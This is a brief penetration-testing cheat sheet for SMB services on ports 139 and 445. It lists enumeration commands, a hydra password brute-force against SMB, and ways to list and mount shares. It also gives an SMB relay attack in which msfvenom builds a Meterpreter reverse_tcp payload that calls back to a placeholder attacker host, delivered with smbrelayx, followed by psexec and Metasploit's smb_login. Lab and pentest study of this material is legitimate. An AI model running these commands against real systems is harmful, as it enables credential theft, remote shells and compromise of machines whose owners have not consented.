139/445 SMB
Home of many vulnerabilities usually leading to compromise. We'll cover automated and basic manual enumeration and the transfer of files.
Last updated: May 4th, 2023
Automated Recon
nmap --script="smb*" -p 139,445 x.x.x.x
enum4linux -A x.x.x.x
Brute Force
hydra -t 4 -l username -P /usr/share/wordlists/rockyou.txt -vV x.x.x.x smb
Listing Shares
smbmap -H x.x.x.x
smbclient -N -L //x.x.x.x
Connecting
smbclient -N //x.x.x.x/share
smbclient -U 'user%pass' //x.x.x.x/share
mount -t cifs //x.x.x.x/sharename /mnt/smb -o guest
#smbrelay attack
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port -f exe -o file_name.exe
smbrelayx -h x.x.x.x -e badexe.exe #use generated exe from above
psexec "<user>"@<ip> -
#meterpreter
use smb_login